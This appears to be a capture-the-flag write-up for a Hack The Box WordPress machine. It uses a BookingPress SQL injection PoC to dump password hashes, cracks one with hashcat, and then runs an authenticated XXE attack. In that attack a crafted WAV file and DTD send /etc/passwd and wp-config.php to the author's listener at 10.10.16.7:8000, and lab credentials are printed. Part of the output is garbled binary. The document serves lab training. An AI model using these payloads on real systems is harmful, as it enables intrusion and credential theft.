80

Its a wordpress site. So I ran WPScan:

wpscan -e ap --url http://metapress.htb
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://metapress.htb/ [10.10.11.186]
[+] Started: Fri Jan 31 19:03:43 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: nginx/1.18.0
 |  - X-Powered-By: PHP/8.0.24
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://metapress.htb/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://metapress.htb/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://metapress.htb/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://metapress.htb/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.6.2 identified (Insecure, released on 2021-02-22).
 | Found By: Rss Generator (Passive Detection)
 |  - http://metapress.htb/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>
 |  - http://metapress.htb/comments/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>

[+] WordPress theme in use: twentytwentyone
 | Location: http://metapress.htb/wp-content/themes/twentytwentyone/
 | Last Updated: 2024-11-13T00:00:00.000Z
 | Readme: http://metapress.htb/wp-content/themes/twentytwentyone/readme.txt
 | [!] The version is out of date, the latest version is 2.4
 | Style URL: http://metapress.htb/wp-content/themes/twentytwentyone/style.css?ver=1.1
 | Style Name: Twenty Twenty-One
 | Style URI: https://wordpress.org/themes/twentytwentyone/
 | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://metapress.htb/wp-content/themes/twentytwentyone/style.css?ver=1.1, Match: 'Version: 1.1'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Jan 31 19:03:51 2025
[+] Requests Done: 47
[+] Cached Requests: 7
[+] Data Sent: 11.483 KB
[+] Data Received: 22.015 MB
[+] Memory used: 284.344 MB
[+] Elapsed time: 00:00:08

And this box has virtual host, so it makes sense to run vhost fuzzing.

ffuf -u http://metapress.htb/ -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H 'Host: FUZZ.metapress.htb' -fs 145

But I get nothing.

Here's what we know so far. Software and their version number:

Wordpress - 5.6.2 - from 2021 which is old.

WPScan couldn't find any plugins which is weird. So I tried analyzing the source code manually. Searching on the /events page, we see a plugin called bookingpress-appointment-booking is used, and directory listing is enabled, so we can checkout this page for version number.

http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/readme.txt

Its version 1.0.10. It is vulnerable to SQL injection vulnerability due to the lack of input sanitization. I found a working exploit for this CVE,

python3 main.py -u http://metapress.htb/events


░█████╗░██╗░░░██╗███████╗░░░░░░██████╗░░█████╗░██████╗░██████╗░░░░░░░░█████╗░███████╗██████╗░░█████╗░
██╔══██╗██║░░░██║██╔════╝░░░░░░╚════██╗██╔══██╗╚════██╗╚════██╗░░░░░░██╔══██╗╚════██║╚════██╗██╔══██╗
██║░░╚═╝╚██╗░██╔╝█████╗░░█████╗░░███╔═╝██║░░██║░░███╔═╝░░███╔═╝█████╗██║░░██║░░░░██╔╝░█████╔╝╚██████║
██║░░██╗░╚████╔╝░██╔══╝░░╚════╝██╔══╝░░██║░░██║██╔══╝░░██╔══╝░░╚════╝██║░░██║░░░██╔╝░░╚═══██╗░╚═══██║
╚█████╔╝░░╚██╔╝░░███████╗░░░░░░███████╗╚█████╔╝███████╗███████╗░░░░░░╚█████╔╝░░██╔╝░░██████╔╝░█████╔╝
░╚════╝░░░░╚═╝░░░╚══════╝░░░░░░╚══════╝░╚════╝░╚══════╝╚══════╝░░░░░░░╚════╝░░░╚═╝░░░╚═════╝░░╚════╝░
PoC for CVE-2022-0739 - Wordpress BookingPresss Plugin Version < 1.0.11

[*] Requesting: http://metapress.htb/events
[*] Got Page. Title: 'Events &#8211; MetaPress'
[+] Vulnerable version detected: 1.0.10
[+] Got Nonce: 0b6c830869
[+] Got AJAX URL: http://metapress.htb/wp-admin/admin-ajax.php
[*] Fetching Target Info...
        [*] Running Data Query: SELECT VERSION(),@@version_comment,@@version_compile_os,0,USER(),DATABASE(),7,8,9
[+] Target Info:
        [+] Version         : 10.5.15-MariaDB-0+deb11u1
        [+] Version Comment : Debian 11
        [+] Compile OS      : debian-linux-gnu
        [+] Database        : blog@localhost
        [+] User            : blog
[*] Leaking Wordpress Credentials...
        [*] Running Data Query: SELECT COUNT(*),2,3,4,5,6,7,8,9 FROM wp_users
[+] User Count: 2
        [*] Running Data Query: SELECT user_login,user_email,user_pass,4,5,6,7,8,9 FROM wp_users LIMIT 1 OFFSET 0
        [*] Running Data Query: SELECT user_login,user_email,user_pass,4,5,6,7,8,9 FROM wp_users LIMIT 1 OFFSET 1

┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ Username ┃ Email                 ┃ Password Hash                      ┃
┡━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ admin    │ [email protected]   │ $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. │
│ manager  │ [email protected] │ $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70 │
└──────────┴───────────────────────┴────────────────────────────────────┘

And we get the password hashes. They are both MD5(wordpress) hashes according to hash-identifier tool. Trying to crack admins hash took forever, but I was able to get manager hash.

hashcat -m 400 manager_hash /usr/share/wordlists/rockyou.txt.gz

We get our first credential: manager:partylikearockstar

We have ftp and ssh open. I tried the credentials on SSH but won't work, same with FTP.

This is not an Administrative panel so we can't achieve PHP code execution with theme editor.

Authenticated XXE

According to this post, this version and any version prior to 5.7 is prone to authenticated XXE vulnerability. The XXE is in the file wp-includes/ID3/getid3.lib.php, which is used to extract metadata information from user uploaded media. As we know XXE vulnerability can be used for LFI to read source code, any other files where we might find sensitive information including credentials. Because this is a WP site, if we can read the wp-config.php, we might find credentials that might give us access to the FTP or SSH services open on the server.

This blog explains it in detail. I read through it to try to understand the vulnerability as much as I can complimented by my XXE notes that I took for CPTS.

I followed through this PoC. I was struggling so I went to the walkthrough.

Step 1: Creating a WAV file with our IP.

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.16.7:8000/exploit.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

It starts with WAV audio files magic bytes. It will make a request (external entity) for a .dtd file that's on our machine. And in that file we can specify any file we want to read, exploiting LFI.

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.10.16.7:8000/?content=%file;'>" >

What it does is it base64 encodes the /etc/passwd and sends it as a parameter to our HTTP server where we will be listening. After that we can just decode it. This method is called Out-of-Band data exfiltration.

We start a PHP server that has a PHP file that can listen for and decode this:

<?php
if(isset($_GET['content'])){
    error_log("\n\n" . base64_decode($_GET['content']));
}
?>

┌──(anonmak9㉿anonmak9)-[~/Desktop/metatwo/phpserver]
└─$ ls
exloit.dtd  index.php

Then I just have to upload it into media

As soon as I upload it we get the file back:

php -S 0.0.0.0:8000
[Fri Jan 31 20:42:49 2025] PHP 8.2.24 Development Server (http://0.0.0.0:8000) started
[Fri Jan 31 20:42:51 2025] 10.10.11.186:49350 Accepted
[Fri Jan 31 20:42:52 2025] 10.10.11.186:49350 [200]: GET /exploit.dtd
[Fri Jan 31 20:42:52 2025] 10.10.11.186:49350 Closing
[Fri Jan 31 20:42:52 2025] 10.10.11.186:49364 Accepted
[Fri Jan 31 20:42:52 2025] 

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
jnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bash
systemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologin
systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:105:111:MySQL Server,,,:/nonexistent:/bin/false
proftpd:x:106:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:107:65534::/srv/ftp:/usr/sbin/nologin

So we know it works. According to the writeup, the WPScan PoC shows that we can read wp-config.php file providing the path ../wp-config.php. So I updated the .dtd file to read this:

cat exploit.dtd 
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=../wp-config.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.10.16.7:8000/?content=%file;'>" >

And we get back the wp-config.php file.

<?php
/** The name of the database for WordPress */
define( 'DB_NAME', 'blog' );

/** MySQL database username */
define( 'DB_USER', 'blog' );

/** MySQL database password */
define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );

/**#@+
 * Authentication Unique Keys and Salts.
 * @since 2.6.0
 */
define( 'AUTH_KEY',         '?!Z$uGO*A6xOE5x,pweP4i*z;m`|.Z:X@)QRQFXkCRyl7}`rXVG=3 n
��Oː�Ή�
N�B�Y�[�J       ��P�T�W�UU��VI� �       ▒I
�U�XKҒIJ�PM��L▒���UΎLQV�Z\���IRTM����WXII�
�ˍ��▒�]��QQZIM  R���W��Z��Z]ɛ���_Jџ���R�I�
N�B�Y�[�J       ӓӐ�W��VI��YQ�   �▒�N׎WJ��әH\�؍QYQ

�S���I��M�^�Y�N
Y���Y�[�J       �UU��S  �������H�Y
��L▒Y���U�X
           ]�
���\�Y  �Nˋ
           �#�2Br��ЦFVf��R�u4T5U$U�UD��4�Br�s�d3bs�SVD�3�D�G����u�T�&���D��6�$�Eu�2g�����d3�"ԓ���r��ЦFVf��R�t��ttTE����4�Br�sE�e5�2�S������u�&��������wՒG���e��4�Ҕd�D�Ud���4���D�c�r��ЦFVf��R�t���4U�4�Br�r�5Rd5�&Ƃ��V6Œ�g�v�U4��CefR7�r'Ƈ�c���6�Dw7bU�CSc���$�r��РТ���Т�v�&E&W72FF&6RF&�R&Vf���Т��ТGF&�U�&Vf���ww�s�РТ���Т�f�"FWfV��W'3�v�&E&W72FV'Vvv��r��FR�Т�Ɩ���GG3���v�&G&W72��&r�7W�'B�'F�6�R�FV'Vvv��r��v�&G&W72�Т��ЦFVf��R�uu�DT%Trr�f�6R��РТ���'6��WFRF�F�F�Rv�&E&W72F�&V7F�'����Ц�b�FVf��VB�t%5D�r���Р�FVf��R�t%5D�r���D�%���r�r��Ч�РТ���6WG2Wv�&E&W72f'2�B��6�VFVBf��W2���Ч&WV�&U���6R%5D��ww�6WGF��w2��s�Р

A bit garbled but we do get FTP_USER credentials. Lets try to log in with metapress.htb:9NYS_ii@FyL_p5M2NvJ

We also get the MySQL credentials blog:635Aq@TdqrCwXFUZ

PreviousEnumeration NextFTP - 21

Last updated 10 months ago

Login into wp-admin

Authenticated XXE